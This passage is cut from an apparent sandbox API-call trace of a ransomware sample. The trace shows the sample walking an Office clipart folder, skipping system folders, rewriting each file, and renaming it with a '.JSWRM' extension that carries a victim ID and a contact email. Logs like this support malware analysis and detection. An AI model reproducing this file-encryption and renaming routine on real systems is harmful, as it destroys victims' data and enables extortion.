lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.495] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17332) returned 1 [0081.495] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x43b0) returned 0x24d210 [0081.496] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x43b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x43b0, lpOverlapped=0x0) returned 1 [0081.545] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.545] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x43b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x43b0, lpOverlapped=0x0) returned 1 [0081.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.545] CloseHandle (hObject=0x314) returned 1 [0081.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0081.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0081.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0081.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0081.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0081.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0081.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0081.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0081.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.547] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105530.WMF", cAlternateFileName="")) returned 1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2=".") returned 1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="..") returned 1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="...") returned 1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="windows") returned -1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="recovery") returned -1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="perflogs") returned -1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="documents and settings") returned 1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="system volume information") returned -1 [0081.547] lstrcmpiW (lpString1="J0105530.WMF", lpString2="msocache") returned -1 [0081.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0081.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105530.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105530.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105530.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0081.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0081.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105530.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105530.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105530.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0081.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.548] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7384) returned 1 [0081.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cd0) returned 0x205850 [0081.548] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1cd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1cd0, lpOverlapped=0x0) returned 1 [0081.550] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.550] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1cd0, lpOverlapped=0x0) returned 1 [0081.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.551] CloseHandle (hObject=0x314) returned 1 [0081.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0081.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0081.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0081.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0081.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0081.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0081.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.551] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0081.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0081.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.552] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x542c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105588.WMF", cAlternateFileName="")) returned 1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2=".") returned 1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="..") returned 1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="...") returned 1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="windows") returned -1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="recovery") returned -1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="perflogs") returned -1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="documents and settings") returned 1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="system volume information") returned -1 [0081.552] lstrcmpiW (lpString1="J0105588.WMF", lpString2="msocache") returned -1 [0081.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0081.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105588.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105588.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105588.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0081.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105588.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105588.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105588.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.553] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21548) returned 1 [0081.553] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5420) returned 0x24d210 [0081.554] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5420, lpOverlapped=0x0) returned 1 [0081.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.556] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5420, lpOverlapped=0x0) returned 1 [0081.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.556] CloseHandle (hObject=0x314) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0081.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0081.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0081.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0081.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.557] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0081.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.558] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105600.WMF", cAlternateFileName="")) returned 1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2=".") returned 1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="..") returned 1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="...") returned 1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="windows") returned -1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="recovery") returned -1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="perflogs") returned -1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="documents and settings") returned 1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="system volume information") returned -1 [0081.558] lstrcmpiW (lpString1="J0105600.WMF", lpString2="msocache") returned -1 [0081.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0081.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105600.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105600.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105600.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0081.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105600.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105600.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105600.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0081.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.559] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8680) returned 1 [0081.559] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21e0) returned 0x205850 [0081.559] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x21e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x21e0, lpOverlapped=0x0) returned 1 [0081.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.561] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x21e0, lpOverlapped=0x0) returned 1 [0081.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.561] CloseHandle (hObject=0x314) returned 1 [0081.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | 